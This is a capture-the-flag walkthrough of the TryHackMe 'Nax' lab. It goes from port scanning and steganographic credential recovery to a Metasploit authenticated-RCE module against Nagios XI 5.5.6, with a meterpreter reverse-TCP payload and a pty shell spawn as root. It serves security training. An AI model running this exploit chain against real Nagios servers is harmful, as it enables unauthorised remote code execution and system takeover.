Nax - TryHackMe Walkthrough
“Identify the critical security flaw in the most powerful and trusted network monitoring software on the market, that allows a user authenticated execute remote code execution.”
This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
We are given the IP 10.10.37.186. Run an nmap scan with the following command:
nmap -A -p- -sS -o portscan 10.10.193.76
Here are the open ports:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA) | 256 af:67:7d:24:e5:95:f4:44:72:d1:0c:39:8d:cc:21:15 (ECDSA) |_ 256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu | Not valid before: 2020-03-23T23:42:04 |_Not valid after: 2030-03-21T23:42:04 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: 400 Bad Request | ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US | Not valid before: 2020-03-24T00:14:58 |_Not valid after: 2030-03-22T00:14:58 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 5667/tcp open tcpwrapped
Let’s check out port 80 on my browser:
,+++77777++=:, += ,,++=7++=,, 7~?7 +7I77 :,I777 I 77 7+77 7: ,?777777??~,=+=~I7?,=77 I =7I7I~7 ,77: ++:~+777777 7 +77=7 =7I7 ,I777= 77,:~7 +?7, ~7 ~ 777? 77+7I 777~,,=7~ ,::7=7: 7 77 77: 7 7 +77,7 I777~+777I= =:,77,77 77 7,777, = 7 ?7 , 7~,~ + 77 ?: :?777 +~77 77? I7777I7I7 777+77 =:, ?7 +7 777? 77 ~I == ~77=77777~: I,+77? 7 7:?7? ?7 7 7 77 ~I 7I,,?7 I77~ I 7=77~+77+?=:I+~77? , I 7? 77 7 777~ +7 I+?7 +7~?777,77I =77 77= +7 7777 ,7 7?7:,??7 +7 7 77??+ 7777, =I, I 7+:77? +7I7?7777 : :7 7 7I7I?77 ~ +7:77, ~ +7,::7 7 ,7~77?7? ?: 7+:77 77 :7777= ?77 +I7+,7 7~ 7,+7 ,? ?7?~?777: I777=7777 ~ 77 : 77 =7+, I77 777 + ~? , + 7 ,, ~I, = ? , 77:I+ ,7 :777 : Welcome to elements. Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr
We are given some elements and a diagram of characters. At this point, I’d like to believe there is a hidden message and the elements are used as some sort of key.
Let’s convert the elements to their corresponding numbers and continue from there.
Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr 47 - 80 - 73 - 51 - 84 - 46 - 80 - 78 - 103
This looks like a string of ASCII characters, let’s convert this to text. I used the following tool:
Make sure the numbers are in the right format - 3 digit codes:
047 080 073 051 084 046 080 078 103 = /PI3T.***
I check to see if this is a path on the web directory:
We get an image, let’s download and inspect it. I try a few commands to see if there is any steganography involved. Some possible tools for inspecting steganography are:
There are plenty more depending on the challenge you are facing. Since the first question of the TryHackMe challenge is “What hidden file did you find?”, I will try and see if there are any hidden files in this image.
Running exiftools revealed a lot of metadata about the image such as the creator, but I had some trouble finding anything interesting so I resorted to using online tools.
Please refer to this website for linux tools and stego web tools:
I finally found a result with this website:
This can be interpreted as a username and password.
Nagios is a software for “IT Infrastructure Monitoring”. Website can be found here:
The directory path should be /nagios.
The username and password don’t work, let’s try and use this elsewhere. No other port would work so I did some more research to nagios. Turns out, this is the URL:
I tried the credentials we found earlier with some luck. Please note, treat the % sign from the username and password we found earlier as a separator.
User and Root
We can find the version of Nagios at the bottom of the page:
Nagios XI 5.5.6
I found this exploit:
This is a metasploit module that uses Authenticated Remote Command Execution. I used the following command to find where the CVE module is located:
Select this module and show the options:
use exploit/linux/http/nagios_xi_authenticated_rce options
Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes Password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes Base path to NagiosXI URIPATH no The URI to use for this exploit (default is random) USERNAME nagiosadmin yes Username to authenticate with VHOST no HTTP server virtual host Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Great, let’s fill the option out. We know all of the required options.
set PASSWORD [password from earlier] set RHOSTS [target IP] set LHOST [TryHackMe IP] (Make sure you use the TryHackMe IP, usually on interface tun0 or similar
We got a shell, I like to work in shell instead of meterpreter so I executed the following commands:
shell python -c 'import pty; pty.spawn("/bin/bash")' id
So we are already as /root. Great, let’s locate user.txt and root.txt.
I found user.txt in a user’s home directory called “galand”
And since we are already root, we can check out the root.txt file in /root:
This was a relatively easy box, I like boxes which have steganography because it’s quite fun but our exploitation already escalated our privileges.